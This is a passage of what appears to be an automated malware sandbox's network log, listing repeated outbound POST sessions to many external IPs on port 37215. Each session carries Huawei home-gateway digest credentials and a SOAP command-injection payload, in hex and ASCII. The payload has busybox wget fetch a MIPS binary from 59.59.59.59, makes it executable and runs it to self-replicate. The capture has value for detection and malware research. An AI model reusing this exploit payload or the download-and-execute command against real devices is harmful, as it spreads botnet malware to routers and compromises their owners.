                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1081192.168.2.1540642133.57.145.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739165068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1082192.168.2.156009847.202.223.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.739187956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1083192.168.2.155843241.100.166.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.716907024 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1084192.168.2.1552924157.23.205.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.722071886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1085192.168.2.154815293.120.39.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.722136021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1086192.168.2.155384282.42.178.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.722158909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1087192.168.2.1536672119.234.184.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.722256899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1088192.168.2.1551788157.167.45.24237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.722280979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1089192.168.2.1557652157.201.63.037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.722301960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1090192.168.2.155369035.185.65.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.722323895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
